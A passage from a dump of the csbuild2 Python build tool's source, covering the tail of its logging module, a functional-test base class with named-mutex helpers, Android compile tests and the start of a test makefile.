\"replace\"))\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tdestination.write(msg)\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tdestination.write(msg.encode(\"ascii\", \"replace\").decode(\"ascii\", \"replace\"))\n\n\t\t\tdestination.write(\"\\n\")\n\n\t\tif shared_globals.logFile:\n\t\t\tshared_globals.logFile.write(\"{0}: {1}\\n\".format(level, msg))\n\t\t_printProgressBar()\n\t\tdestination.flush()\n\ndef Pump():\n\t\"\"\"\n\tPrint logs that have been inserted into the queue from another thread.\n\tLogs inserted on the main thread are printed immediately -\n\tin single-threaded contexts this function is irrelevant\n\t\"\"\"\n\ttry:\n\t\t# Pump all logs till we get an Empty exception, then return\n\t\twhile True:\n\t\t\tevent = _logQueue.Get()\n\t\t\t_writeLog(*event)\n\texcept IndexError:\n\t\treturn\n\ndef SetCallbackQueue(callbackQueue):\n\t\"\"\"\n\tSet the callback queue for threaded logging - a Pump call will be added to the queue each time a log call is made.\n\tThis will ensure that logs are printed as quickly as possible after being inserted into the queue.\n\n\t:param callbackQueue: A queue for executing Pump calls\n\t:type callbackQueue: queue.Queue\n\t\"\"\"\n\tglobal _callbackQueue\n\t_callbackQueue = callbackQueue\n\ndef StartLogThread():\n\t\"\"\"Start the log thread\"\"\"\n\tglobal _callbackQueue\n\t_callbackQueue = queue.Queue()\n\tglobal _logThread\n\tdef _logThreadRunner():\n\t\twhile True:\n\t\t\ttask = _callbackQueue.GetBlocking()\n\t\t\tif task is _stopEvent:\n\t\t\t\treturn\n\t\t\ttask()\n\t_logThread = threading.Thread(target=_logThreadRunner)\n\t_logThread.start()\n\ndef StopLogThread():\n\t\"\"\"Stop the log thread if it's running. If not, this is a nop.\"\"\"\n\tglobal _logThread\n\tif threading.currentThread() != _logThread:\n\t\t_callbackQueue.Put(_stopEvent)\n\t\t_logThread.join()\n\t\t_logThread = threading.current_thread()\n\ndef _logMsg(color, level, msg, quietThreshold):\n\t\"\"\"Print a message to stdout\"\"\"\n\tif shared_globals.verbosity < quietThreshold:\n\t\tif isinstance(msg, BytesType):\n\t\t\tmsg = msg.decode(\"UTF-8\")\n\t\tif threading.currentThread() == _logThread:\n\t\t\t_writeLog(color, level, msg)\n\t\telse:\n\t\t\tassert _callbackQueue is not None, \"Threaded logging requires a callback queue (shared with ThreadPool)\"\n\t\t\t_logQueue.Put((color, level, msg))\n\t\t\t_callbackQueue.Put(Pump)\n\ndef _logMsgToStderr(color, level, msg, quietThreshold):\n\t\"\"\"Print a message to stderr\"\"\"\n\tif shared_globals.verbosity < quietThreshold:\n\t\tif isinstance(msg, BytesType):\n\t\t\tmsg = msg.decode(\"UTF-8\")\n\t\tif threading.currentThread() == _logThread:\n\t\t\t_writeLog(color, level, msg, sys.stderr)\n\t\telse:\n\t\t\tassert _callbackQueue is not None, \"Threaded logging requires a callback queue (shared with ThreadPool)\"\n\t\t\t_logQueue.Put((color, level, msg, sys.stderr))\n\t\t\t_callbackQueue.Put(Pump)\n\n\ndef _formatMsg(msg, *args, **kwargs):\n\tshowTime = kwargs.get(\"showTime\")\n\tif showTime is True or showTime is None:\n\t\tcurtime = time.time( ) - shared_globals.startTime\n\t\tmsg = \"{} ({})\".format(PlatformUnicode(msg), FormatTime(curtime, False))\n\tif showTime is not None:\n\t\tdel kwargs[\"showTime\"]\n\n\tif not isinstance(msg, BytesType) and not isinstance(msg, StrType):\n\t\treturn repr(msg)\n\tif args or kwargs:\n\t\treturn msg.format(*args, **kwargs)\n\treturn msg\n\n\ndef Error(msg, *args, **kwargs):\n\t\"\"\"\n\tLog an error message\n\n\t:param msg: Text to log\n\t:type msg: BytesType, StrType\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.RED, \"ERROR\", msg, Verbosity.Mute)\n\tshared_globals.errors.append(msg)\n\n\ndef Warn(msg, *args, **kwargs):\n\t\"\"\"\n\tLog a warning\n\n\t:param msg: Text to log\n\t:type msg: BytesType, StrType\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.YELLOW, \"WARN\", msg, Verbosity.Mute)\n\tshared_globals.warnings.append(msg)\n\n\ndef WarnNoPush(msg, *args, **kwargs):\n\t\"\"\"\n\tLog a warning, don't push it to the list of warnings to be echoed at the end of compilation.\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.YELLOW, \"WARN\", msg, Verbosity.Mute)\n\n\ndef Info(msg, *args, **kwargs):\n\t\"\"\"\n\tLog general info. This info only appears with -v specified.\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.CYAN, \"INFO\", msg, Verbosity.Normal)\n\n\ndef Build(msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to building\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.MAGENTA, \"BUILD\", msg, Verbosity.Quiet)\n\n\ndef Test(msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to testing - typically used by the unit test framework, but could be used\n\tby makefiles that run tests as part of a build\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.MAGENTA, \"TEST\", msg, Verbosity.Quiet)\n\n\ndef Linker(msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to linking\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.GREEN, \"LINKER\", msg, Verbosity.Quiet)\n\n\ndef Thread(msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to threads, particularly stalls caused by waiting on another thread to finish\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.BLUE, \"THREAD\", msg, Verbosity.Quiet)\n\n\ndef Install(msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to the installer\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.WHITE, \"INSTALL\", msg, Verbosity.Quiet)\n\n\ndef Command(msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to executing commands\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.YELLOW, \"COMMAND\", msg, Verbosity.Quiet)\n\n\ndef Custom(color, name, msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to some custom aspect of a build tool\n\n\t:param color: Color to log with, taken from csbuild.log.Color\n\t:type color: varies by platform. Options are documented in csbuild._utils.terminfo.TermColor, but exposed through log via log.Color\n\t:param name: Name of the log level (i.e., \"BUILD\", \"INSTALL\", etc)\n\t:type name: str\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(color, name, msg, Verbosity.Quiet)\n\ndef Stdout(msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to the installer\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, showTime=False, *args, **kwargs)\n\t_logMsg(None, None, msg, Verbosity.Mute)\n\ndef Stderr(msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to the installer\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, showTime=False, *args, **kwargs)\n\t_logMsgToStderr(None, None, msg, Verbosity.Mute)\n" }, { "alpha_fraction": 0.7086004018783569, "alphanum_fraction": 0.7117165327072144, "avg_line_length": 31.275861740112305, "blob_id": "647001e88bf3f1d01c00343bb78e4ad8e148cd56", "content_id": "b79c0ae452de14399b8421d439c17cb8c0a2e039", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11232, "license_type": "permissive", "max_line_length": 169, "num_lines": 348, "path": "/csbuild/_testing/functional_test.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: functional_test\n\t:synopsis: A base class for functional tests, which will execute makefiles\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport sys\nimport threading\nimport shutil\nimport platform\nimport re\n\nfrom .testcase import TestCase\nfrom .. import log, commands\nfrom .._utils import PlatformString, queue\nfrom .._utils.string_abc import String\n\nif platform.system() == \"Windows\":\n\t# pylint: disable=import-error\n\timport ctypes\n\tfrom ctypes import wintypes\n\t# Create ctypes wrapper for Win32 functions we need, with correct argument/return types\n\t_CreateMutex = ctypes.windll.kernel32.CreateMutexA\n\t_CreateMutex.argtypes = [wintypes.LPCVOID, wintypes.BOOL, wintypes.LPCSTR]\n\t_CreateMutex.restype = wintypes.HANDLE\n\n\t_WaitForSingleObject = ctypes.windll.kernel32.WaitForSingleObject\n\t_WaitForSingleObject.argtypes = [wintypes.HANDLE, wintypes.DWORD]\n\t_WaitForSingleObject.restype = wintypes.DWORD\n\n\t_ReleaseMutex = ctypes.windll.kernel32.ReleaseMutex\n\t_ReleaseMutex.argtypes = [wintypes.HANDLE]\n\t_ReleaseMutex.restype = wintypes.BOOL\n\n\t_CloseHandle = ctypes.windll.kernel32.CloseHandle\n\t_CloseHandle.argtypes = [wintypes.HANDLE]\n\t_CloseHandle.restype = wintypes.BOOL\n\n\tclass _namedMutex(object):\n\t\t# pylint: disable=invalid-name\n\t\t\"\"\"Represents a named synchronization primitive - a named mutex in windows, a file lock in linux\"\"\"\n\t\tdef __init__(self, name):\n\t\t\t# Backslashes not ok. Forward slashes are fine.\n\t\t\tself.name = \"csbuild/\"+name.replace(\"\\\\\", \"/\")\n\t\t\tif sys.version_info[0] >= 3:\n\t\t\t\tself.name = self.name.encode(\"UTF-8\")\n\t\t\tret = _CreateMutex(None, False, self.name)\n\t\t\tif not ret:\n\t\t\t\traise ctypes.WinError()\n\t\t\tself.handle = ret\n\n\t\tdef acquire(self):\n\t\t\t\"\"\"Acquire the lock\"\"\"\n\t\t\ttimeout = 0xFFFFFFFF\n\t\t\tret = _WaitForSingleObject(self.handle, timeout)\n\t\t\tif ret not in (0, 0x80, 0x102):\n\t\t\t\t# Waiting failed\n\t\t\t\traise ctypes.WinError()\n\n\t\tdef release(self):\n\t\t\t\"\"\"Release the lock\"\"\"\n\t\t\tret = _ReleaseMutex(self.handle)\n\t\t\tif not ret:\n\t\t\t\traise ctypes.WinError()\n\n\t\tdef close(self):\n\t\t\t\"\"\"Close the lock\"\"\"\n\t\t\tret = _CloseHandle(self.handle)\n\t\t\tif not ret:\n\t\t\t\traise ctypes.WinError()\n\n\t\tdef __enter__(self):\n\t\t\tself.acquire()\n\n\t\tdef __exit__(self, excType, excVal, tb):\n\t\t\tself.release()\n\t\t\treturn False\nelse:\n\timport fcntl # pylint: disable=import-error\n\timport tempfile\n\n\tclass _namedMutex(object):\n\t\t# pylint: disable=invalid-name\n\t\t\"\"\"Represents a named synchronization primitive - a named mutex in windows, a file lock in linux\"\"\"\n\t\tdef __init__(self, name):\n\t\t\tself.name = os.path.join(tempfile.gettempdir(), name)\n\t\t\tdirname = os.path.dirname(self.name)\n\t\t\tif not os.access(dirname, os.F_OK):\n\t\t\t\tos.makedirs(dirname)\n\t\t\tself.handle = open(self.name, 'w')\n\n\t\tdef acquire(self):\n\t\t\t\"\"\"Acquire the lock\"\"\"\n\t\t\tfcntl.flock(self.handle, fcntl.LOCK_EX)\n\n\t\tdef release(self):\n\t\t\t\"\"\"Release the lock\"\"\"\n\t\t\tfcntl.flock(self.handle, fcntl.LOCK_UN)\n\n\t\tdef close(self):\n\t\t\t\"\"\"Close the lock\"\"\"\n\t\t\tself.handle.close()\n\n\t\tdef __enter__(self):\n\t\t\tself.acquire()\n\n\t\tdef __exit__(self, excType, excVal, tb):\n\t\t\tself.release()\n\t\t\treturn False\n\ndef ListFiles(startpath):\n\t\"\"\"\n\tList the files in a directory in a nice tree structure\n\t:param startpath: Directory\n\t:type startpath: str\n\t:return: String representation of the directory structure\n\t:rtype: str\n\t\"\"\"\n\tret = \"\"\n\tfor root, _, files in os.walk(startpath):\n\t\tlevel = root.replace(startpath, '').count(os.sep)\n\t\tindent = ' ' * 4 * (level)\n\t\tret += '{}{}/\\n'.format(indent, os.path.basename(root))\n\t\tsubindent = ' ' * 4 * (level + 1)\n\t\tfor f in files:\n\t\t\tret += '{}{}\\n'.format(subindent, f)\n\treturn ret\n\nclass FunctionalTest(TestCase):\n\t\"\"\"\n\tBase class for running functional tests that invoke an actual makefile.\n\t\"\"\"\n\tdef setUp(self, outDir=\"out\", intermediateDir=\"intermediate\", cleanAtEnd=True, cleanArgs=None): #pylint: disable=arguments-differ\n\t\tself._prevdir = os.getcwd()\n\n\t\tif os.getenv(PlatformString(\"CSBUILD_RUNNING_THROUGH_PYTHON_UNITTEST\")) != PlatformString(\"1\"):\n\t\t\tmodule = __import__(self.__class__.__module__)\n\t\t\tpath = os.path.dirname(module.__file__)\n\t\telse:\n\t\t\tpath = os.path.dirname(self.__class__.__module__.replace('.', os.path.sep))\n\n\t\tself.mtx = _namedMutex(os.path.join(path, \"lock\"))\n\t\tself.mtx.acquire()\n\n\t\tif PlatformString(\"CSBUILD_NO_AUTO_RUN\") in os.environ:\n\t\t\tself._oldenviron = os.environ[PlatformString(\"CSBUILD_NO_AUTO_RUN\")]\n\t\t\tdel os.environ[PlatformString(\"CSBUILD_NO_AUTO_RUN\")]\n\t\telse:\n\t\t\tself._oldenviron = None\n\n\t\tif not os.path.exists(path):\n\t\t\tpath = os.path.join(\"functional_tests\", path)\n\t\tos.chdir(path)\n\n\t\tself.outDir = outDir\n\t\tself.intermediateDir = intermediateDir\n\t\tself.cleanAtEnd = cleanAtEnd\n\n\t\tself.cleanArgs = cleanArgs\n\n\t\t# Make sure we start in a good state\n\t\tif os.access(outDir, os.F_OK):\n\t\t\tshutil.rmtree(outDir)\n\t\tif os.access(intermediateDir, os.F_OK):\n\t\t\tshutil.rmtree(intermediateDir)\n\t\tif os.access(\".csbuild\", os.F_OK):\n\t\t\tshutil.rmtree(\".csbuild\")\n\n\tdef tearDown(self):\n\t\ttry:\n\t\t\tif self.cleanAtEnd:\n\t\t\t\tif self.cleanArgs is not None:\n\t\t\t\t\tself.RunMake(\"--clean\", *self.cleanArgs)\n\t\t\t\telse:\n\t\t\t\t\tself.RunMake(\"--clean\")\n\t\t\t\tif os.access(self.outDir, os.F_OK):\n\t\t\t\t\tself.fail(\"Out dir not removed by clean:\\n{}\".format(ListFiles(self.outDir)))\n\t\t\t\tif os.access(self.intermediateDir, os.F_OK):\n\t\t\t\t\tself.fail(\"Intermediate dir not removed by clean:\\n{}\".format(ListFiles(self.intermediateDir)))\n\t\tfinally:\n\t\t\tos.chdir(self._prevdir)\n\t\t\tif self._oldenviron is not None:\n\t\t\t\tos.environ[PlatformString(\"CSBUILD_NO_AUTO_RUN\")] = self._oldenviron\n\t\t\tself.mtx.release()\n\t\t\tself.mtx.close()\n\n\tdef RunMake(self, *args):\n\t\t\"\"\"\n\t\tRun the test's local makefile with the given args. The makefile must be in the same directory and named make.py\n\t\t:param args: Arguments to pass\n\t\t:type args: str\n\t\t:return: Tuple of returncode, stdout and stderr output from the process\n\t\t:rtype: tuple[int, str, str]\n\t\t\"\"\"\n\t\tcommands.queueOfLogQueues = queue.Queue()\n\t\toutputThread = threading.Thread(target=commands.PrintStaggeredRealTimeOutput)\n\t\toutputThread.start()\n\n\t\tcallbackQueue = queue.Queue()\n\t\tlog.SetCallbackQueue(callbackQueue)\n\n\t\tclass _shared(object):\n\t\t\tret = (0, \"\", \"\")\n\n\t\tdef _runCommand():\n\t\t\tcmd = [sys.executable, os.path.abspath(\"make.py\")]\n\t\t\tcmd.extend(args)\n\t\t\tcmd.append(\"--force-progress-bar=off\")\n\n\t\t\tdef _handleStdout(shared, msg):\n\t\t\t\tcommands.DefaultStdoutHandler(shared, \" {}\".format(msg))\n\n\t\t\tdef _handleStderr(shared, msg):\n\t\t\t\tcommands.DefaultStderrHandler(shared, \" {}\".format(msg))\n\n\t\t\t_shared.ret = commands.Run(cmd, stdout=_handleStdout, stderr=_handleStderr, cwd=os.getcwd(), env=os.environ)\n\t\t\tcallbackQueue.Put(commands.stopEvent)\n\n\t\tcommandThread = threading.Thread(target=_runCommand)\n\t\tcommandThread.start()\n\t\twhile True:\n\t\t\tcallback = callbackQueue.GetBlocking()\n\n\t\t\tif callback is commands.stopEvent:\n\t\t\t\tbreak\n\t\t\tcallback()\n\n\t\tcommands.queueOfLogQueues.Put(commands.stopEvent)\n\t\toutputThread.join()\n\t\tlog.SetCallbackQueue(None)\n\n\t\tcommandThread.join()\n\n\t\tansiEscape = re.compile(r'\\x1b[^m]*m')\n\t\treturncode, output, errors = _shared.ret\n\t\toutput = ansiEscape.sub(\"\", output)\n\t\terrors = ansiEscape.sub(\"\", errors)\n\t\treturn returncode, output, errors\n\n\t# pylint: disable=invalid-name\n\tdef assertMakeSucceeds(self, *args):\n\t\t\"\"\"\n\t\tAssert that running a makefile succeeds\n\t\t:param args: Arguments to pass\n\t\t:type args: str\n\t\t:return: Tuple of returncode, stdout and stderr output from the process\n\t\t:rtype: tuple[int, str, str]\n\t\t\"\"\"\n\t\treturncode, output, errors = self.RunMake(*args)\n\t\tself.assertEqual(returncode, 0)\n\t\treturn returncode, output, errors\n\n\tdef assertMakeRaises(self, error, *args):\n\t\t\"\"\"\n\t\tAssert that running a makefile fails with the given exception\n\t\t:param args: Arguments to pass\n\t\t:type args: str\n\t\t:param error: Error or exception to search for in the logs\n\t\t:type error: Exception or str\n\t\t:return: Tuple of returncode, stdout and stderr output from the process\n\t\t:rtype: tuple[int, str, str]\n\t\t\"\"\"\n\t\treturncode, output, errors = self.RunMake(*args)\n\t\tself.assertNotEqual(returncode, 0)\n\t\tif not isinstance(error, String):\n\t\t\terror = error.__name__\n\t\tself.assertIn(error, errors)\n\t\treturn returncode, output, errors\n\n\tdef assertMakeFails(self, error, *args):\n\t\t\"\"\"\n\t\tAssert that running a makefile fails with the given csbuild error\n\t\t:param args: Arguments to pass\n\t\t:type args: str\n\t\t:param error: Error regular expression to search for in the logs\n\t\t:type error: str\n\t\t:return: Tuple of returncode, stdout and stderr output from the process\n\t\t:rtype: tuple[int, str, str]\n\t\t\"\"\"\n\t\treturncode, output, errors = self.RunMake(*args)\n\t\tself.assertNotEqual(returncode, 0)\n\t\terror = re.compile(error)\n\t\toutMatch = error.search(output)\n\t\terrMatch = error.search(errors)\n\t\tself.assertTrue(outMatch is not None or errMatch is not None)\n\t\treturn returncode, output, errors\n\n\tdef assertFileExists(self, filename):\n\t\t\"\"\"\n\t\tAssert that an expected file exists\n\t\t:param filename: file to check\n\t\t:type filename: str\n\t\t\"\"\"\n\t\tself.assertTrue(os.access(filename, os.F_OK), \"No such file: {}\".format(filename))\n\n\tdef assertFileDoesNotExist(self, filename):\n\t\t\"\"\"\n\t\tAssert that an expected file doesn't exists\n\t\t:param filename: file to check\n\t\t:type filename: str\n\t\t\"\"\"\n\t\tself.assertFalse(os.access(filename, os.F_OK), \"File exists: {}\".format(filename))\n\n\tdef assertFileIsExecutable(self, filename):\n\t\t\"\"\"\n\t\tAssert that an expected file is executable\n\t\t:param filename: file to check\n\t\t:type filename: str\n\t\t\"\"\"\n\t\tself.assertTrue(os.access(filename, os.X_OK), \"No such executable file: {}\".format(filename))\n\n\t# pylint: disable=invalid-name\n\tdef assertFileContents(self, filename, expectedContents):\n\t\t\"\"\"\n\t\tAssert that an expected file exists and its contents are as expected\n\t\t:param filename: file to check\n\t\t:type filename: str\n\t\t:param expectedContents: Contents to check against\n\t\t:type expectedContents: str\n\t\t\"\"\"\n\t\tself.assertFileExists(filename)\n\t\twith open(filename, \"r\") as f:\n\t\t\tfoundContents = f.read()\n\t\t\tself.assertEqual(expectedContents, foundContents, \"File {} did not contain expected contents (Expected {}, got {})\".format(filename, expectedContents, foundContents))\n" }, { "alpha_fraction": 0.7398805618286133, "alphanum_fraction": 0.7451891303062439, "avg_line_length": 39.186668395996094, "blob_id": "e1b3706fcc7352974b898b6fc0e179510915d2f8", "content_id": "a139e2a9c0ac3a18054b934b70277c8691c28951", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3014, "license_type": "no_license", "max_line_length": 139, "num_lines": 75, "path": "/functional_tests/android_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Basic test of assembler tools\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom csbuild._testing.functional_test import FunctionalTest\n\nimport os\nimport unittest\n\[email protected](\"ANDROID_NDK_ROOT\" in os.environ and \"ANDROID_HOME\" in os.environ, \"ANDROID_NDK_ROOT and/or ANDROID_HOME not defined\")\nclass AndroidTest(FunctionalTest):\n\t\"\"\"Android functional test\"\"\"\n\n\t# pylint: disable=invalid-name\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tself.outputFile = \"out/hello_world.so\"\n\t\toutDir = \"out\"\n\t\tFunctionalTest.setUp(self, outDir=outDir)\n\n\tdef testClangX86CompileSucceeds(self):\n\t\t\"\"\"Test that the project succesfully compiles\"\"\"\n\t\ttestArgs = [\"--project=hello_world\", \"--arch=x86\", \"--toolchain=android-clang\"]\n\t\tself.cleanArgs = testArgs\n\t\tself.assertMakeSucceeds(\"-v\", \"--show-commands\", *testArgs)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\n\tdef testClangX64CompileSucceeds(self):\n\t\t\"\"\"Test that the project succesfully compiles\"\"\"\n\t\ttestArgs = [\"--project=hello_world\", \"--arch=x64\", \"--toolchain=android-clang\"]\n\t\tself.cleanArgs = testArgs\n\t\tself.assertMakeSucceeds(\"-v\", \"--show-commands\", *testArgs)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\n\tdef testClangArmCompileSucceeds(self):\n\t\t\"\"\"Test that the project succesfully compiles\"\"\"\n\t\ttestArgs = [\"--project=hello_world\", \"--arch=arm\", \"--toolchain=android-clang\"]\n\t\tself.cleanArgs = testArgs\n\t\tself.assertMakeSucceeds(\"-v\", \"--show-commands\", *testArgs)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\n\tdef testClangArm64CompileSucceeds(self):\n\t\t\"\"\"Test that the project succesfully compiles\"\"\"\n\t\ttestArgs = [\"--project=hello_world\", \"--arch=arm64\", \"--toolchain=android-clang\"]\n\t\tself.cleanArgs = testArgs\n\t\tself.assertMakeSucceeds(\"-v\", \"--show-commands\", *testArgs)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n" }, { "alpha_fraction": 0.7404751181602478, "alphanum_fraction": 0.7431644797325134, "avg_line_length": 36.18333435058594, "blob_id": "73ee8a1fb801c2f0c3fcb589fd70d57a9007af5b", "content_id": "794e4c69513f580b85c12966d268243745924a42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6693, "license_type": "no_license", "max_line_length": 152, "num_lines": 180, "path": "/functional_tests/toolchain_architecture_combinations_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nfrom csbuild.toolchain import Tool\nimport os\n\ncsbuild.SetOutputDirectory(\"out\")\n\nclass WriteOutput(Tool):\n\t\"\"\"Dummy class\"\"\"\n\tinputFiles = None\n\n\tdef __init__(self, projectSettings, ext):\n\t\tself._ext = ext\n\t\tTool.__init__(self, projectSettings)\n\n\tdef Run(self, inputProject, inputFile):\n\t\toutFile = os.path.join(inputProject.outputDir, \".\".join([inputProject.outputName, inputProject.architectureName, inputProject.targetName, self._ext]))\n\t\tcsbuild.log.Build(\"Writing {}\", outFile)\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(\"foo\")\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\nclass WriteA(WriteOutput):\n\t\"\"\"Dummy class\"\"\"\n\tsupportedArchitectures = {\"A\", \"B\", \"C\", \"D\"}\n\toutputFiles = {\".A\"}\n\tdef __init__(self, projectSettings):\n\t\tWriteOutput.__init__(self, projectSettings, \"A\")\n\nclass WriteB(WriteOutput):\n\t\"\"\"Dummy class\"\"\"\n\tsupportedArchitectures = {\"A\", \"B\", \"C\", \"D\"}\n\toutputFiles = {\".B\"}\n\tdef __init__(self, projectSettings):\n\t\tWriteOutput.__init__(self, 